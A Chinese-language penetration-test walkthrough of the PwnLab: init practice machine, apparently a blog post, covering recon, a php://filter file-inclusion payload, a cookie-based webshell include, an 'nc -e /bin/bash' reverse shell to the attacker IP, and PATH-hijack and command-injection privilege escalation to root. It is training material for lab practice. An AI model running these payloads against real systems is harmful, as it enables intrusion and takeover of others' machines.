【pwnlab_init靶场渗透】

文章目录

一、基础信息

二、信息收集

三、漏洞利用

四、反弹shell

五、提权


一、基础信息

Kali IP :192.168.20.146

靶机IP:192.168.20.157

二、信息收集

nmap -sS -sV -p- -A 192.168.20.157

开放了80、111、3306、50749等端口

访问一下80端口

提示使用这个服务进行上传和共享图片文件等,点击一下upload需要登录

扫描目录看一下

dirsearch -u http://192.168.20.157 -x 403

访问images目录看到有一张图片,保存到本地看一下有没有信息

http://192.168.20.157/images/pwnlab.png

好像没啥内容,然后看到了文件上传的目录

http://192.168.20.157/upload/

然后有几个php文件,但是访问没有内容显示

三、漏洞利用

通过观察网址有可能是存在文件包含的,利用php伪协议进行查看文件

包含config文件,经过尝试后要去掉php后缀

http://192.168.20.157/?page=php://filter/convert.base64-encode/resource=config

解码得到数据库密码,同时可以尝试包含upload和index文件,解码可得到源码

连接数据库查看账户信息

得到三个用户和密码信息,密码疑似base64加密,可进行解密得到密码

复制代码
kent /JWzXuBJJNy
Mike/SIfdsTEn6I
Kane/iSv5Ym2GRo

尝试登录之前的页面

登录成功,尝试上传文件

上传成功

前面知道上传地址,蚁剑访问一下,连接不成功

分析index.php源代码,它以cookie的值作为路径,这个参数为lang

复制代码
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.

那我们就添加一个cookie:lang=../upload/85bb6e49a1be4be02eefb660f9d8cf68.jpg

连接成功

四、反弹shell

nc -e /bin/bash 192.168.20.146 9090

五、提权

上面获得了三个账户密码,尝试登录一下

复制代码
kent /JWzXuBJJNy
Mike/SIfdsTEn6I
Kane/iSv5Ym2GRo

Mike账户无法登录,Kent登录后没发现特殊内容

登录到kane用户,发现家目录下有个msgmike文件,但是文件拥有者是mike,不是很清楚文件是干什么的,看wp提示说该程序的作者试图在cat不提供完整路径的情况下运行了命令!

提权方法:

在运行Bash程序cat的/tmp目录中创建了一个文件shell,并将其添加到$PATH环境变量的开头,系统先cat在/tmp目录中查找二进制文件,并将执行我们的shell!

在tmp目录下:

复制代码
echo /bin/bash > cat    ---创建一个shell命令的文件:/bin/sh
chmod 777 cat         ---赋权
export PATH=/tmp:$PATH  ---赋予tmp目录环境变量
cd && ./msgmike

cd /home/mike

在mike目录下存在msg2root文件,但是文件拥有者为root

尝试再次执行不完整路径任意命令sh,成功获得root权限!

复制代码
./msg2root
; /bin/bash -p
more /root/flag.txt
相关推荐
终焉暴龙王4 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川5 小时前
Apache文件解析漏洞
web安全·apache
希望奇迹很安静12 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南15 小时前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
Johny_Zhao15 小时前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
北极光SD-WAN组网1 天前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
落鹜秋水1 天前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
pencek1 天前
XCTF-crypto-幂数加密
网络安全
会议之眼1 天前
截稿倒计时 TrustCom‘25大会即将召开
网络安全
小猫会后空翻1 天前
RCE真实漏洞初体验
渗透·rce